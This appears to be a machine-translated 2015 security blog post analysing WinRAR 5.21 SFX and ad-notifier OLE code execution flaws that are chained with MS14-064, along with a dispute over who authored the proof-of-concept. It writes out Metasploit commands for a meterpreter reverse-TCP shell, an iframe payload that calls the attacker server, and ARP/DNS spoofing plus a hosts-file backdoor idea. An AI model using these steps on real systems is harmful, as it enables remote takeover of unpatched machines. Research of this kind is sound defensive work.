Merit student · 2015/10/12 10:35
0 x00 preface
Late last month, a code execution Vulnerability in WinRAR 5.21 was exposed, which Vulnerability Lab rated as high risk at 9 out of 10, while security researcher Mohammad Reza Espargham released PoC, Implementation of the user to open SFX file hidden execution of attack code, but WinRAR official RARLabs believe that this function is a software installation necessary, there is no need to issue any repair patches or upgrade version.
I thought I could skip the bug, but digging deeper revealed something even more interesting.
0x01 WinRar 5.21 – SFX OLE Code Execution Vulnerability
WinRar 5.21-SFX OLE code execution vulnerability
1. Related concepts
SFX: self-extracting file is a type of compressed file that can be decompressed without installation of compression software
Ms14-064: Microsoft Windows OLE Remote code execution vulnerability, affecting Win95+IE3 – Win10+IE11 full version, actual use in Win7 above system due to the existence of IE sandbox mechanism, start the process beyond the white list will pop-up prompt, as shown in the figure
2. Principle of vulnerability
SFX file creation support to add HTML script, but not restricted by the IE sandbox, if the host has ms14-064 vulnerability, after opening the SFX file containing MS14-064 EXP, can be hidden to execute any code
3. Test environment
Windows 7 x86 ms14-064 vulnerability install WinRar 5.21Copy the code
4. Test process
The implementation is relatively simple, so I’ll cover it briefly
(1) Set up the server
use exploit/windows/browser/ms14_064_ole_code_execution
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.40.131
set LPORT 1234
exploit
Copy the code
As shown in figure
(2) Generate SFX
Right-click a file and add it to the compressed file select Create SFX Archive click Advanced click SFX Options click Text and IconCopy the code
Enter the following code in Text to Display in SFX Windows:
< iframe SRC = "http://192.168.40.131:8080/YrrArF9oTAQ7j" > < iframe >Copy the code
(3) Run SFX files
Double click to bring Meterpreter online
5, analysis,
- This in SFX file to add HTML code method has been a long time ago, for example in the early 08 existing Winrar hang horse relevant link: http://www.2cto.com/Article/200804/25081.html
- The highlight of this vulnerability is that it allows ms14-064 exp to escape the IE sandbox
- Find out if there are SFX OLE code execution vulnerabilities: if you come across a.exe compressed file, right-click -property-comment and view the contents as shown in the figure below
0 x02 poc mystery
Vulnerability Lab and Malwarebytes, as well as various websites, are already interesting in exaggerating vulnerabilities, but the attribution of POC authors brings up something even more interesting.
The following time nodes are sorted out according to the collected information:
1. WinRAR 5.21 code execution vulnerability was exposed by seclists.org
Mohammad Reza Espargham’s POC is published
Date: 28/09/2015
Related links: seclists.org/fulldisclos…
2. WinRar official RARLabs made the first response
Restricting HTML functionality in SFX modules can affect normal user use, and attackers can still use older SFX modules, custom modules from non-unrar source code, or home-built code archives, so RARLabs refuses to provide patches for this and again reminds users that any file should be verified as a reliable source
Related links: www.rarlab.com/vuln_sfx_ht…
3. RARLabs made a second response
In the end, R-73en (RioSherri) reported Mohammad Reza Espargham for copying his POC code
Related links: www.rarlab.com/vuln_sfx_ht…
4, 0day.today May prove the existence of plagiarism
(1) R-73EN first POC
Date: 25/09/2015
Related links :0day.today/exploit/242…
(2) Mohammad Reza Espargham followed by poC
Date: 26-09-2015
Relevant link: cn. Zero day. Today/exploits / 242…
5, R-73EN to prove the strength of the second vulnerability WinRAR(expiration notification) OLE remote code execution vulnerability POC
Date: 30-09-2015
Related links :0day.today/exploit/243…
6. RARLabs responded to the second vulnerability published by R-73EN by refusing to fix it
- The trial version of WinRaR will pop-up a window prompting registration, this vulnerability may be exploited - utilization conditions: the network was hijacked and ms14-064 vulnerability patch was not installed - but also pointed out that if the utilization conditions are met, then the system itself is not safe, already beyond the scope of WinRaR software itself - therefore refused to update the patch for this vulnerabilityCopy the code
Related links :www.rarlab.com/vuln_web_ht…
0x03 WinRAR – (Expired Notification & Advertising) OLE Remote Code Execution Vulnerability
Although the WinRAR(Out-of-date Notification) OLE remote code execution vulnerability was also ignored by RARLabs, the thinking is very interesting, and of course the POC published by R-73en needs to be partially modified for more WinRAR environments
1. Relevant knowledge
We often encounter the following situations when using WinRAR:
When you open WinRAR, there will be pop-up ads, prompting users to pay to remove the ads, and there will be differences in the links of different versions of WinRAR ads. http://www.win-rar.com/notifier/ in Chinese advertising links: http://www.winrar.com.cn/ad/ * * *Copy the code
2. Principle of vulnerability
By default, WinRAR accesses specific urls. If you can hijack and replace the ms14-064 attack code, you can easily execute arbitrary code remotely and escape the IE sandbox
3. Test environment
Win7 x86 ms14-064 vulnerability install WinRar 5.21CNCopy the code
4. Test process
(1) Build server download POC, related link: 0day.today/exploit/243…
The POC needs to be modified slightly (no modification methods are provided here), and the Python script is executed, as shown
Note: If you understand the ms14-064 vulnerability principle, this is easy to modify
(2) Redirect http://www.winrar.com.cn to the server IP address
Arp and DNS spoofing can be used
(3) Use WinRar to open any file
Default pop-up AD, trigger bug, pop-up calculator, as shown
5, analysis,
- Although this vulnerability condition is relatively limited, but the idea is very enlightening, can try to take advantage of other software default pop-up web pages
- You can permanently change the AD link to the ServerIP by modifying the host file, ultimately implementing an alternative backdoor boot
- Precautions against this vulnerability:
- Prevent network hijacking
- Install the MS14-064 vulnerability patch
0 x04 summary
WinRar has relatively few vulnerabilities, but it is worth further study if other attacks can break through its officially declared security logic.
This article was originally written by three good students and first published by Cloud Drops